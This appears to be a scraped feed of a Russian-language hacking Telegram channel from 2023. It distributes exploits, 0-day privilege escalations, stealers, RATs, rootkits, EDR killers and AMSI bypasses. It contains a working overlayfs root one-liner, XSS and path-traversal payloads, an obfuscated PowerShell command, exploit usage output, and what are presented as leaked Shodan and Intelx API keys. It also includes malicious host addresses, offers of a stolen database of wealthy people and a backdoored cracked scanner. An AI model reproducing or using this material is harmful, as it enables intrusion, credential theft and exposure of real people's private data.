SHODAN keys успевайтеOefcMxcunkm72Po71vVtX8zUN57vQtACPSKINdQe1GyxGgecYz2191H2JoS9qvgDpHHlgpFt8Ka3Stb5UlTxcaEwciOeF2QM61TvA2dNwxNxmWziZxKzR5aO9tFD00NjxTbXXOSBr0R65OcClImSwzadExoXU4tcEJV3A4Mka2wPs7P8VBCO6xcpRe27iNJumEuInz8UH1ixLGJq4oQhEiJORERVG5xclkY0ng0XMo29zEhzyw3ibQfeEBxghwPFsyeCnFndQ8TE4qAGvhm9nZLBZOBgoLKd7TeyFZ8oyLulHwYUOcSPzZ5w3cLYib61v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kikdTNGRiwYNozXIDRf5DWyGNbkdiS5m3JKkdnzf4fsYWQmGajRDn3hB0RElbUlIaquboYedPn8iDWi6GDSO6h2kz72VLt6bZ3SFQNAMUdkeqXqVOdXsTLYeatFSpZSktdbOygcaGSSq46Lg5fZiADAuFxl4OBbn7zmXAbsu1Ruj5uhTNcxGdbGNgrh9WuMS1B6nkGd8uVE4oryfUVvioprswdKGmA5InzZXYdjHDeJM36AjDfU1feBsyMJIj8XxGzDEBeU0lGqtIO6yCxVFCWC4nUVbvovtjo5 |
|
2023-08-11 04:35:02 |
malware and #exploits http://103.89.15.53/ |
Images
|
2023-08-10 07:36:12 |
АнонсLPE 0daywin 10 - 11win_srv 2012 - 2016 - 2019 - 2022 |
Images
|
2023-08-10 05:47:30 |
Вот Вам мини трик (хейт спич) про OpenVPN.Если у вас linux и прости хоспаде NetworkManager (а в нем еще и плагин для всяких ipsec\vpn\wireguard\etc) и из него не конектит до сервера OpenVPN, но при этом если запускать руками через консоль, то все отлично работает. Тогда в консоли пишем journalctl -u NetworkManagerсреди кучи логов можно grepнуть:AUTH: Received control message: AUTH_FAILED,Data channel cipher negotiation failed (no shared cipher) Вторая ссылка гугла отправит нас в репозиторий openvpn, где белом по черному написано (см скрин), что клиент\сервер добазариться не могут чем шифровать наш траффик на госуслуги (не проплачено) и онлифанс (проплачено).И тут есть 2 пути, либо прописать в обоих конфигах нужный алгоритм шифрования, либо пойти в конфиг клиента и закоментить строку cipher.#vpn #кофе |
Images
Images
Images
|
2023-08-09 15:55:47 |
Обходим AntiMalware Scan interface в Windows 11 в 2023 году*powershell_assembly*#AMSI #win11 #яЕстьХочу |
Images
|
2023-08-09 11:42:52 |
CVE-2023-38182Microsoft Outlook 365 Пропатчено только вчераХостов много#outlook #1day |
Images
|
2023-08-09 07:27:28 |
АААААА 🤮 |
Images
|
2023-08-08 19:06:03 |
CVE-2023-34034Spring WebFlux Write-Up and POC |
Images
|
2023-08-07 11:31:30 |
CVE-2023-3269Linux kernel privilege escalation vulnerabilityexploit |
Images
|
2023-08-07 11:30:31 |
CVE-2023-3269 StackRot Linux kernel privilege escalation vulnerability Ждем ждем)) #linux #lpe |
|
2023-07-31 13:12:31 |
ога блин, счастье , что инета нет или что )))) |
|
2023-07-31 13:11:18 |
звони уже Балин))) |
|
2023-07-31 13:11:09 |
None |
Images
|
2023-07-29 17:18:39 |
CVE-2023-35078 Уязвимость удаленного доступа к API Access vulnerability обнаружена в Ivanti Endpoint Manager Mobile (EPMM)POC exploit |
Images
|
2023-07-29 09:06:30 |
Напоминаю, что в эту субботу будет митап в Санкт-Петербурге. Одевайтесь по погоде и приезжайте на митап, будет интересно! Митап пройдет 29 июля, в 12:00 в Измайловском центре, м. Технологический институт, Измайловский пр., 2 / наб. р. Фонтанки, 120 Мероприятие… |
|
2023-07-28 18:25:01 |
красивое |
Images
|
2023-07-28 17:22:57 |
Знаете, а я приду к Вам завтра ))) |
|
2023-07-28 15:18:39 |
Самый короткий exploit в мире (возможно)unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")' |
Images
|
2023-07-28 11:33:56 |
Etoro.com DataBase.com200000 строк богатых людей |
Images
|
2023-07-28 08:25:17 |
Сисадмины с праздником. Вот вам подарок )CVE-2023-35885 Cloudpanel 1-day ExploitДля версий : v2.0.0 – v2.3.0Пропатчено : 20-06-2023 (v2.3.1)*Exploit + shell#праздникъ #клоунpanel #xploet #shыll |
Images
|
2023-07-27 16:36:35 |
О, прикольно !malware traffic analysis#malware |
Images
|
2023-07-27 15:47:02 |
CVE-2023-29336Дырка в драйвере ядра Win32k и эксплуатируется при открытии специально созданного падонками успешными людьми RTF-файла. LPE до systemАналитика#windows #lpe |
|
2023-07-27 07:04:51 |
WSPCoercePoC для принудительной аутентификации с хостов Windows с использованием MS-WSP.Хост будет подключаться через SMB к хосту листенера, используя учетную запись компьютера.DOWNLOAD#windows #smb |
Images
|
2023-07-26 05:10:10 |
outlook email auth bypassdownload POC and read#outlook |
Images
|
2023-07-26 05:00:00 |
kernel-exploit-factoryLink |
Images
|
2023-07-24 11:51:42 |
Понедельники гавно) |
Images
|
2023-07-21 10:54:06 |
Любят всякие техники\админы\rootiNы\девопсы мультиплексоры типа gnu screen или tmux. Удобно красиво и небезопасно).Задавшись утром вопросом, как заставить его работать на себя (не трогая всякие bashrc и тд), путь был найден. В screen есть директива hardstatus string, которая посредством марсианского языка отрисовывает в терминале информативный статусБар (хостнейм\время\сессии и тд).Так вот, hardstatus string в качестве аргумента может принять и скрипт и линк))), ну а что в скрипте сами понимаете.Пока нашлось 2 способа, красивый марсианский и быдлоБытовой. |
Images
Images
|
2023-07-21 08:42:31 |
BurpSuite PRO version 2023.7JAVA - 18 |
|
2023-07-20 13:35:35 |
Acunetix Premium v14.2.210505179 Full Activated 2023 + BACKDOOR только для постоянных подписчиковЗабавное видео#backdoor #acunetix #резилКоторогоНеБыло |
Images
|
2023-07-20 04:26:21 |
Kevin mitnickF |
|
2023-07-19 17:09:20 |
OpenSSH RCE (forwarded ssh-agent)CVE-2023-38408Интересно#ssh |
Images
|
2023-07-19 13:44:42 |
ColdFusion XSSPOC:{{host}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(document.domain) |
Images
|
2023-07-18 17:27:32 |
От local admin до domain adminAV/EDR - тоже в отстое, потому что дублируется токен реального админа (если конечно запущен такой процесс)hypobrychium#windows #edr #av #admin |
Images
|
2023-07-17 16:32:20 |
#humor_or_not) |
Images
|
2023-07-17 13:33:16 |
CVE-2023-32117Google Drive Plugin, WordPress и отсутствие авторизации via REST API EndpointsPOC CURL ) |
Images
Images
|
2023-07-17 12:33:24 |
GAP#BurpSuite |
Images
|
2023-07-16 14:15:04 |
CVE-2023-20110Cisco Smart Software Manager On-Prem SQL Injection Vulnerability exploit#cisco #sql #exploit |
|
2023-07-16 08:12:03 |
HVNC for Cobalt Strike *Еще одна реализация, хотя сам протокол VNC не задействован (форк TinyNuke)покрытие:Windows Server 2022 x64Windows Server 2016 x64Windows Server 2012 R2 x64Windows Server 2008 x86Windows 7 SP1 x64Download#cobalt #hvnc |
Images
|
2023-07-15 14:09:59 |
Proxy bar в гостях у failover bar ) |
Images
|
2023-07-15 08:34:50 |
CVE-2023-37582 EXPLOITApache RocketMQ *Для теста присутствует RocketMQ environment via Docker*exploit*#apache #exploit #docker |
Images
|
2023-07-14 10:01:08 |
Пятничное#humor |
Images
|
2023-07-13 16:59:10 |
Если openVPN\wireguard не спасает (меня не спасает)то либо ipsec на свой сервер (но это муторно)заверните ВСЁ через ssh (sshuttle)одной командой:sshuttle -r root@TARGETHOST:22 0/0 -x TARGETHOST:22 --dns#ебаныйРКН |
|
2023-07-13 04:45:34 |
CVE-2023-35803 Extreme Networks/Aerohive Wireless Access PointsPOC exploit |
Images
|
2023-07-12 18:51:30 |
О, интересно, только что сгрузили BlackLotus UEFI Windows Bootkit Сорцы\панелька\манЫть#bootkit |
Images
|
2023-07-12 12:58:14 |
SatIntelИзвлечение спутниковой телеметрии, получение орбитальных прогнозов и анализ TLE.Круто !!! Звучит как новое хоббиGet |
Images
|
2023-07-12 09:43:26 |
supermanKill The Protected Processdownload |
|
2023-07-12 07:31:20 |
Кроба книгу написал)))#humor |
Images
|
2023-07-11 11:02:19 |
CVE-2023-24489Citrix ShareFile RCE🔥POC exploit + разбор#citrix |
Images
|
2023-07-11 05:50:50 |
Доброе утро, включаем рабочие машинки ! ) |
Images
|
2023-07-10 20:48:28 |
CVE-2023-31998exploit for Ubiquiti EdgeRouterРазбор уязвимости и POC exploit тут |
Images
|
2023-07-10 07:29:59 |
NimBlackoutЕще один киллер AV/EDRdownload |
|
2023-07-10 07:15:35 |
Оу, какой стиллер))мефедр Phemedrone Stealer Приятный кач, демократические цены)))download#stealer |
Images
|
2023-07-09 17:38:43 |
hvextРасширение Windbg, реализующее команды, полезные для изучения Hyper-V на процессорах Intel.Полезно для ресёрчеров.Да, была использована буква Ёdownload#hyper-v #windgb |
|
2023-07-08 17:46:31 |
Нужна небольшая помощь !есть у кого fucking veeamнужны:Veeam.Backup.Common.dllVeeam.Backup.Interaction.MountService.dllVeeam.Backup.Model.dllа то сплоит не собирается, а качать не хочется.пришлите на почту proxy-bar@proton.me#help |
|
2023-07-08 17:01:11 |
TakeMyRDP 2.0 Обновленная версия кейлогера, предназначенная для процессов, связанных с протоколом удаленного рабочего стола (RDP). Он использует низкоуровневую перехватчик ввода с клавиатуры, что позволяет записывать нажатия клавиш в определенных контекстах (например, в mstsc.exe и CredentialUIBroker.exe).download#rdp |
Images
|
2023-07-08 10:31:10 |
humorsad, but true |
Images
|
2023-07-08 08:33:09 |
Manjaro LPE 0day root LPE for latest Manjaro distro, tested on embedded ARM and x86_64exploit#arch #manjaro #lpe |
Images
|
2023-07-08 07:09:09 |
Рубрика "забавное"http://copy.sh/v86/?profile=windows98#win98 #win2000 |
Images
|
2023-07-07 14:50:13 |
CVE-2023-3269StackRot Linux kernel privilege escalation vulnerabilityЖдем ждем))#linux #lpe |
|
2023-07-07 08:38:05 |
CVE-2023-2868Barracuda ESG Command Injection*Usage:ruby poc_cve_2023_2868.rb <TARGET_IP>*POC exploit |
|
2023-07-07 08:15:04 |
Cisco CCNA 200-301 Exam Complete Course with practical labslink#cisco #ccna |
|
2023-07-01 05:24:14 |
#Рубрика - "смешное"*NoMoreCookiesStealers/RATs Tested:AsyncRATQuasar RATStormKittyFireFox-ThiefDcRatXWorm RAT*Link |
Images
|
2023-07-01 04:46:41 |
С добрый утром ! 🙃 |
|
2023-06-30 18:55:12 |
Ребят, тут Windows Common Log File System протёк Есть патч от апреля, так что не 0-DayCVE-2023-28252POC exploit #windows #lpe |
Images
|
2023-06-30 14:06:05 |
Decrypt FortiManager configuration secrets #fortinet #dec |
Images
|
2023-06-30 07:50:39 |
CVE-2023-2982WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass exploit🔥🔥🔥 |
Images
|
2023-06-29 13:22:32 |
CVE-2023-3338 Linux kernel LPE exploitпока не дорого)#linux #lpe |
Images
|
2023-06-28 20:42:49 |
CVE-2023-26258RCEArcServe UDP BackupclickME |
Images
|
2023-06-27 12:12:58 |
CVE-2023-35844directory traversalexpl |
Images
|
2023-06-27 06:21:22 |
Shellcode Execution via EnumSystemLocalAread |
Images
|
2023-06-27 05:08:16 |
winampcve#humor |
Images
|
2023-06-26 19:48:38 |
DIY Linux Kernel Rootkit DetectionХорошая статья для понимания процессов которые влекут за собой руткиты и как их ловить (или чего еще))))Ловить будет руткит reveng_rtkit с помощью osquery-defense-kit#rootkit #linux |
Images
|
2023-06-26 19:39:54 |
Exploits targeting Symfonyсвят свят свят |
Images
|
2023-06-26 16:43:22 |
CVE-2023-32784 KeePass 2.X Master Password Dumper Буфер обмена подвел )) POC |
Images
|
2023-06-25 07:58:13 |
Когда твоя стирально\отжимательная машина пошла в ransom |
Images
|
2023-06-25 07:54:02 |
Заражение открытых ключей SSH бэкдорами(ну не только, в целом любую херню можно запускать, так как шелл, а сторогой валидации строки нет, в процем ее и нет в MTS банке)))read#ssh |
Images
|
2023-06-25 07:38:33 |
CVE-2023-27372SPIP (before 4.2.1)RCEEXploit#spip #rce |
Images
|
2023-06-17 06:54:20 |
Tor site deanon by EtagА можно просто отключить кэш Etag )))Кипишь#tor #deanon |
Images
|
2023-06-16 15:14:30 |
Intelx Admin API Keyvar API_URL = 'https://2.intelx.io/';var API_KEY = '62fb1e77-0309-4893-80c8-a817c1e76917'; |
|
2023-06-16 14:58:41 |
Продадим ультра софт, да, не новый, но классика )для покупателей proxy-bar@proton.me |
Images
|
2023-06-16 13:27:59 |
CVE-2023-1829LPE exploitTested on Ubuntu22.04 -_ -#linux #exploit |
|
2023-06-16 09:41:30 |
#РукаЛицо📗Вопрос блокировки в РФ мессенджера WhatsApp не обсуждается, предпосылок нет — Шадаев. 🌚Обсуждается, ведется работа - так как через это дырявое вражеское приложение идет документооборот всех силовых структур России и не только силовых!!! - Ситников.😎Хуле вы разнылись, внедряй повелевай VipNet hw-1000 и защищенная почта из рук в руки, голосовые через ТА-57 ))) - Администрация Proxy bar#Пятница |
|
2023-06-15 17:58:33 |
Banshee rootkitWindows x64 Kernel Driver/RootkitЭкспериментальный !!!*download#rootkit #win |
Images
|
2023-06-15 07:23:59 |
Rusty BootkitWindows UEFI Bootkit in Rust (Codename: RedLotus)download#bootkit #win #rust |
Images
|
2023-06-14 20:10:10 |
anonfiles searchby гугле ) |
Images
|
2023-06-13 16:12:00 |
CVE-2023-20887 VMWare vRealize Network Insight Pre-Authenticated RCE exploit#vmware #rce #exploit |
|
2023-06-13 05:26:23 |
Station X - The Complete Cyber Security Course - Volumes 1, 2, 3 & 4 download 11.5 GB |
Images
|
2023-06-13 05:22:10 |
CVE-2023-2008 Бага в драйвере udmabuf ядра Linux (исправлено в версии 5.19-rc4.)impact такое себе, нужен доступ к /dev/udmabuf от kvm юзера*Analyzing and exploitingexploit#linux #exploit |
Images
|
2023-06-12 19:52:18 |
когда логика привела к 6 ошибкам )#humor |
Images
|
2023-06-12 12:54:29 |
CVE-2023-34362 MOVEitexploit + crt + pem + pubUsage:python CVE-2023-34362.py https://127.0.0.1[*] Getting sysadmin access token[*] Got access token[*] Getting FolderID[*] Got FolderID: 963611079[*] Starting file upload[*] Got FileID: 965943963[*] Injecting the payload[*] Payload injected[*] Triggering payload via resume call[+] Triggered the payload![*] Deleting uploaded file |
|
2023-06-12 12:45:17 |
MySQL Fake Serverdownload+docker |
Images
|
2023-06-12 07:50:14 |
Не обновляйтесь до новой версии Debian 12critical bugsОхереть релиз))#debian #LoL 🧐 |
Images
|
2023-06-12 06:26:20 |
CVE-2023-25157GeoServer SQL Injection - POC exploitGeoServer SQL Injection - check vuln script |
Images
|
2023-06-12 06:03:31 |
SharpTerminatorПоубивать процессы AV/EDR с помощью драйвера ядра download#edr |
Images
|
2023-06-08 08:01:22 |
libssh CVE-2023-2283POC exploitusage:~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub#ssh |
Images
|
2023-06-08 07:46:09 |
DropSpawnCobaltStrike BOF для создания маяков с использованием DLL Application Directory Hijackingdownload |
Images
|
2023-06-08 07:41:08 |
SignatureGateБоевая версия HellsGate, обходящая AV/EDR/EPP путем злоупотребления опциональным исправлением CVE-2013-3900download#bypass #edr |
Images
|
2023-06-03 14:25:01 |
Создаем и обфусцируем DLL которая отключит AMSI и ETWreadMEdownload LightsOut |
Images
|
2023-06-03 08:27:25 |
Прикольно, но зачем последний октет икситьbrute.fail#bruteforce |
|
2023-06-02 14:30:06 |
CVE-2022-20421Bad Spin: Android Binder Privilege Escalation Exploitdownload#android |
|
2023-06-01 15:58:34 |
Какой боевойhXXp://34.101.154.50/ |
Images
|
2023-06-01 14:34:28 |
Rootkit INTRACTABLEGIRAFFEproof of concept*Из прикольного:Использует скрытую виртуальную файловую систему (VFS) для хранения файлов за пределами стандартной файловой системы Windows. При чем как энергозависимую, так и энергонезависимую скрытую VFS.Keylogger - для демонстрации*download#windows #rootkit |
Images
|
2023-06-01 13:09:08 |
CVE-2023-23638Apache-DubboPOC exploit#apache |
Images
Images
|
2023-06-01 12:11:42 |
придумайте слоган на фильма )) |
Images
|
2023-05-31 14:44:47 |
так и живем, на xss запрещают, на экспосе разрешают.Пронаблюдаем ! |
Images
|
2023-05-31 06:31:25 |
просто прекрасно |
Images
|
2023-05-31 06:26:05 |
Data Structures & Algorithms Essentials using C++ (2022)7.3 GBLink |
|
2023-05-30 16:02:09 |
raid forum это конечно хорошоа вот настоящий слив !есть ли тут связь ?)😝 |
Images
|
2023-05-30 14:31:41 |
show time ))) |
|
2023-05-30 07:45:24 |
Министерство обороны США рекомендует:DevSecOps Fundamentals Guidebook |
Images
|
2023-05-30 07:31:01 |
CVE-2023-33246*Apache RocketMQ*readPOC |
|
2023-05-29 20:30:00 |
Emoji Shellcoding 😋Улыбаемся и бэкдоримRISC-V#shellcodes #smile |
Images
|
2023-05-29 12:35:50 |
RansomchatsСборка чатов\переговоров с рансомварщиками )#ransom |
Images
|
2023-05-29 06:48:14 |
kill anti-malware protected processes (BYOVD) |
Images
|
2023-05-29 06:23:51 |
CVE-2023-32315openfire xmppserver Administration Console authentication bypasspath traversal - только в UTF-16 http://localhost:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jspА кто вообще в здравом уме, после инсталла держит папку setup на сервере ? read#jabber |
|
2023-05-28 16:22:36 |
car hacking courselink |
Images
|
2023-05-28 06:43:17 |
CVE-2023-2825GitLab - Community Edition\Enterprise EditionУязвимость позволяет неавторизованным пользователям читать произвольные файлы через ошибку обхода пути.POC Exploit#gitlab |
Images
|
2023-05-21 19:35:47 |
Слив темы инжектов, chromium расширение для работы с ботамиФункционал: Инжект скриптов в веб-страницы Сбор cookies в формате .json Отправление PUSH уведомлений Создание скрытого скриншота текущего экрана браузера Просмотр всех установленных расширений и их включение/выключение Получение актуального URL на котором находится бот Выгрузка истории браузера в формате .json Использование IP бота и его куки (reverse proxy)ссылка https://xss.is/threads/80558/Стоимость продукта на форуме : 5.000$ |
|
2023-05-21 06:43:17 |
SSH-HarvesterПолучаем пароли ssh пользователей в открытом виде.Ну да ну да, еще пару лет назад была статья, что ssh сервер при авторизации порождает 2 процесса, на одном из которых пасс катится в открытом виде, собственно на этом моменте его и вытягивают.В общем поставили скрипт, рыбалка идет сама собойDownload |
Images
|
2023-05-20 19:04:51 |
Еще раз о linux persistenceНичего нового, но красиво и уже готовые скриптыread#linux #backdoors #oldbutnotuseless |
Images
|
2023-05-20 12:05:29 |
Тут LockBit (ransomware запрещено на территории квартиры) взяли, да и перевели "Руководство пользователя по Cobalt Strike'у 4.7" на русский язык.К чему это все, думайте сами)))) |
|
2023-05-19 17:27:49 |
Пятничное |
Images
|
2023-05-19 14:44:48 |
DevSecOps guidesПочитать |
|
2023-05-19 11:09:42 |
CVE-2023-21554win message подъехалиPOC#win #poc |
|
2023-05-19 07:29:51 |
ChatGPT как C&C, Хех)#GPT #C2 |
Images
|
2023-05-18 10:34:14 |
UAC_Bypass2.c#bypass |
|
2023-05-17 21:19:22 |
AntiRansomware Linux Kernel Module Это успех, то есть, для защиты от рансома, был написан фактически rootkit с перехватом sys_renameА вот затея с суффиксами плохая, всегда можно генерить на основе железа и например хоть аптайма уникальный суффиксlink |
Images
|
2023-05-17 16:04:40 |
Занятный PowerShell обфускатор${;}=+$();${=}=${;};${+}=++${;};${@}=++${;};${.}=++${;};${[}=++${;};${]}=++${;};${(}=++${;};${)}=++${;};${&}=++${;};${|}=++${;};${"}="["+"$(@{})"[${)}]+"$(@{})"["${+}${|}"]+"$(@{})"["${@}${=}"]+"$?"[${+}]+"]";${;}="".("$(@{})"["${+}${[}"]+"$(@{})"["${+}${(}"]+"$(@{})"[${=}]+"$(@{})"[${[}]+"$?"[${+}]+"$(@{})"[${.}]);${;}="$(@{})"["${+}${[}"]+"$(@{})"[${[}]+"${;}"["${@}${)}"];"${"}${.}${[}+${"}${)}${@}+${"}${+}${=}${+}+${"}${+}${=}${&}+${"}${+}${=}${&}+${"}${+}${+}${+}+${"}${[}${[}+${"}${.}${@}+${"}${+}${+}${|}+${"}${+}${+}${+}+${"}${+}${+}${[}+${"}${+}${=}${&}+${"}${+}${=}${=}+${"}${.}${.}+${"}${.}${[}|${;}"|&${;}; есть триалка#poweshell |
Images
|
2023-05-17 15:37:00 |
CVE-2023-32243wordpressEssential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalationexploit#wordpress #plugin |
|
2023-05-17 15:30:49 |
SCCM/MECMЕще один способActive Directory Spotlight: Attacking Microsoft's Configuration Manager#sccm #ad |
Images
|
2023-05-17 11:58:44 |
Exploit NotesВ целом ничего нового, но компиляция красиваяread#pentest |
|
2023-05-16 20:33:46 |
CVE-2023-32233exploit#Linux #LPE |
|
2023-05-16 19:24:27 |
From DA to EA with ESC5или уязвимый контроль доступа к объектам PKIread and run #AD #PKI |
Images
|
2023-05-13 18:44:08 |
Прикольно |
|
2023-05-12 20:56:55 |
Тушу |
|
2023-05-12 20:26:06 |
Завтра |
|
2023-05-12 17:56:00 |
None |
Images
|
2023-05-12 17:54:58 |
Ххм |
|
2023-05-12 17:54:50 |
None |
Images
|
2023-05-12 17:35:35 |
Боже |
|
2023-05-10 21:10:56 |
Этож знал.НиктоПростиПрости всех |
|
2023-05-10 20:14:04 |
Курить хочу |
|
2023-05-10 20:13:48 |
Спасибо |
|
2023-05-10 20:13:43 |
Нет ненадо |
|
2023-05-10 20:13:21 |
Но |
|
2023-05-10 20:13:08 |
Как больно |
|
2023-05-10 20:12:42 |
Бляя |
|
2023-05-10 20:12:36 |
Цените что есть |
|
2023-05-10 20:12:07 |
Рнбятт |
|
2023-05-10 20:11:56 |
Блятььььь |
|
2023-05-10 20:08:50 |
Блять |
|
2023-05-10 20:08:38 |
Сукп |
|
2023-05-10 20:08:34 |
Аааааа́сссссссссааааааа́сс |
|
2023-05-10 20:08:22 |
Мать твою |
|
2023-05-10 19:10:08 |
Ладно гуляем |
|
2023-05-10 19:09:49 |
None |
Images
|
2023-05-10 18:25:25 |
Это круто |
|
2023-05-10 18:25:15 |
Уж извините |
|
2023-05-10 18:24:59 |
None |
Images
|
2023-05-10 18:24:49 |
Ребят Это красво |
|
2023-05-10 18:06:28 |
Молодецы |
|
2023-05-10 18:06:13 |
Мужики дело делают |
|
2023-05-10 18:05:53 |
Отлично |
|
2023-05-10 18:05:44 |
Вот это бои |
|
2023-05-10 16:46:22 |
Гоу |
|
2023-05-10 16:46:17 |
None |
Images
|
2023-05-07 18:31:32 |
ты не маленький винтик в системеты важная часть механизмапросто помни об этом ))) |
Images
|
2023-05-06 04:37:08 |
Positive hack days 12Не забываем, что совсем скоро мероприятиегде: Москвакогда: 19-20 маялокация: парк Горькогоphdays12*Приходите, будет весело) |
Images
|
2023-05-05 20:31:52 |
CVE-2023-28231DHCP Server Remote Code Executionimpact: 2008 R2 SP1 до Server 2019#windows #dhcp #exploit |
|
2023-05-05 12:01:14 |
CVE-2023-0386Linux Kernel Privilege Escalation*readME*exploit#linux #exploit |
Images
|
2023-05-05 06:30:45 |
SCCMHunterНайти и подломить sccm это всегда праздник, фиеста и платиново-бриллиантовые ключи от города домена. Веселее только с ansible.Ну так вот, 11 часов назад, выкатили post-ex tool, которая способствует !Link#windows #sccm |
Images
|
2023-05-04 19:48:52 |
По поводу слива АЛЬФА БАНКАНу да, паспорта слили |
Images
|
2023-05-04 16:11:14 |
Happy World Password Day! |
Images
|
2023-05-04 09:15:32 |
Apache Solr 8.3.1admin panel RCE (Windows)readmeexploit#apache #exploit |
|
2023-05-04 05:59:52 |
Извлекаем хэши NetNTLMv2 входящих аутентификаций через SMBPOC*Usage:C:\Temp\>EtwHash.exe 60 |
|
2023-05-04 05:41:17 |
HoneybitsХанипот с дополнительными хлебными крошками.Из интересного:Fake PCAP / network traffic containing credentials and etc.Fake ARP Table entries.То есть, в целом, это можно использовать и НЕ для защиты, мусорный трафик бывает полезен.Link#security |
Images
|
2023-05-03 15:34:07 |
signal-zeroday-exploitusage:python poc.py -t [TARGET PHONE #] -i [IP HERE] -p [PORT HERE] |
|
2023-05-03 14:49:32 |
К праздникам скидки )))) |
Images
|
2023-05-02 09:20:46 |
CVE-2023-21554Нужно только пакетик отправить на MSMQ-сервер (да, он должен быть включен) и можно выполнять remote commandPOC Пакетик#windows |
Images
|
2023-05-02 06:30:17 |
Заходите#Osint_eventНас звали, и мы пришли Osint Workshop Ⅳ (Moscow edition) ! В этот раз наша команда посетит столицу и расскажет о новых методиках, интересных кейсах и погрузит вас в атмосферу наших профессиональных будней. Ждем вас 😉Планируемые доклады: "Osint и S.E. в Нетворкинге, Поиск влиятельных друзей в цифровом океане"● Автор: «Обмани Меня»"Osint в адвокатской деятельности"● Автор: [REDACTED]"Дом выигрывает всегда? В поисках владельцев одного казино"● Автор: «Исследуя конкурентов» При участии: Moon, Dana Scully(возможно, к нам присоединятся наши коллеги из Москвы)Мероприятие пройдет 13 мая, в 18:00 по адресу: Green Vault, лаундж-бар, Верхняя Радищевская улица, 13-15, МоскваВход без паспорта, бесплатно. |
Images
|
2023-05-02 06:28:25 |
Ну а что, все законно ))) |
Images
|
2023-05-01 14:28:09 |
curl https://sudo.ws/ftp/etc/groupхмммм |
Images
|
2023-04-29 06:20:49 |
И еще раз о CVE-2023-29489 cPanel и XSSFinding XSS in a million websites#cPanel #xss |
Images
|
2023-04-28 11:51:37 |
CVE-2023-29489cPanel#cPanel #xss |
Images
Images
|
2023-04-28 09:15:33 |
Шо, Опять babuk, conti и все все все ?Пятница серьезно вступила в свои праваМеня шантажируют, я не знаю что делать |
|
2023-04-28 07:56:56 |
Public malware techniques used in the wildVirtual MachineEmulationDebuggersSandbox detection*RUN #malware |
Images
|
2023-04-27 04:56:49 |
CVE-2023-29007Git Arbitrary Configuration Injection*readme*POC exploit#git #exploit |
Images
|
2023-04-27 04:09:31 |
CVE-2023-1585 and CVE-2023-1587Смешное)))Avast Anti-Virus privileged arbitrary file create on virus quarantinereadme*POC exploit#avast #LPE |
Images
|
2023-04-25 15:42:14 |
Не статья, а книга целаяransomware diaries volume 2 A Ransomware Hacker Origin StoryUPD: а теперь они в твитере сруться )))#ransome |
Images
|
2023-04-25 13:37:02 |
Очень хорошо*An Introduction into Sleep ObfuscationreadFull Ekko code#Obfuscation |
Images
|
2023-04-25 13:06:31 |
CVE-2023-27524Apache Superset Auth BypassPOC exploitдень бога я смотрю#apache #poc |
|
2023-04-25 13:03:16 |
CVE-2023-1671Pre-Auth RCE in Sophos Web ApplianceCVSS score of 9.8POC#poc #sophos |
|
2023-04-25 07:50:24 |
httpXXX://147.182.180.78:8081/CraxsRat-Linuxndroid/#CraxsRAT #CypherRAT |
Images
|
2023-04-18 16:18:06 |
Sandbox EscapePOCДырка в преобразователе исходного кода (логика очистки исключений) vm2 для версий до 3.9.15, позволяющая злоумышленникам обходить handleException() и передавать непроверенные исключения хоста, которые можно использовать для выхода из песочницы и запуска произвольного кода в контексте хоста. |
Images
|
2023-04-16 15:41:25 |
CVE-2021-35250да, 21 год, да если хорошие люди просят мы публикуемпатч ? пачт ?!!SolarWinds-CVE-2021-35250 POC exploit*Немедленно вспоминается атака на цепочки поставок#solar |
Images
|
2023-04-16 03:18:08 |
829 гигов мусора |
Images
|
2023-04-13 16:46:44 |
И чо |
|
2023-04-13 16:24:08 |
Ээ́асеисещэ |
|
2023-04-13 16:23:41 |
Спасиро7это типа.срсаЛадно |
|
2023-04-13 04:06:36 |
Приветдруг, канал закрытПОЧЕМУ ????ложусь в больниуцупросить , нет, не буду, сама сдохну.....канал...... если успею... передамвсе спасибо, вы лучшиеBTC bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82но вы понимаете, не обязательноЗЫесли вырнусь, верусь, добра мап |
|
2023-04-13 00:54:23 |
ох))))) тут нужно целый сесёрч писать, но пошел он нахуй, лучше выпью и вот я уже на ГИТе внутренней сетки, не возможно ?да , еще как можно ))))))))))))))))))))) |
|
2023-04-13 00:51:50 |
щас я вам аккаунты то приподниму ______))))) |
|
2023-04-13 00:51:22 |
это просито пиздец)))))))))))))))))))))))))))))))) |
|
2023-04-13 00:51:10 |
блять )))))) |
|
2023-04-13 00:50:55 |
None |
Images
|
2023-04-01 20:33:53 |
В рамках науч-ИТ-юмор-драмы A list of my 10 UNIX command line mistakes#1april |
Images
|
2023-03-31 20:27:42 |
Linux kernel CVEsALL CVE - на сейчас 2359 CVEЭто не сплоиты или POC, такие кумулятивы бывают крайне полезны, а тут по папкам\по кернелу\с описанием\где пофиксили*linux_kernel_cves#linux #kernel #vulns |
Images
|
2023-03-30 13:11:34 |
Нет, мистер из FBI, вы нас больше не обманите.С восстановлением рангов с raidforum конечно максимально круто ! Нужно думать кого то неДоПоймали, а значит нужно взять знакомую веб морду, дропнуть БД и задеплоить ханипот, а дальше американский майор разберется по какой статье\из какой страны тебя экстрадировать#FBI |
Images
|
2023-03-30 07:40:21 |
В Питере пройдет Osint туса*А мы продолжаем! Osint Workshop ⅠⅠ Программа мероприятия подойдет как профессионалам, которые хотели бы освежить основы дисциплин, так и для полных новичков. Будет интересно обещаю ;) Ожидаемые доклады:"История возникновения OSINT" Автор: Вильям Арчибальд "Social Еngineering & OSINT: методология, инструменты, актуальные сферы применения"● Автор: @socialqueen"OSINT в корпоративной безопасности" ● Автор: @OsintOpsChannelАктуальная информация и стрим мероприятия на канале: Schwarz_OsintВоркшоп будет проходить 8 апреля в 18:00. Место проведения: Артмуза (13-я лин. В.О, 70, Санкт-Петербург). |
Images
|
2023-03-29 19:16:30 |
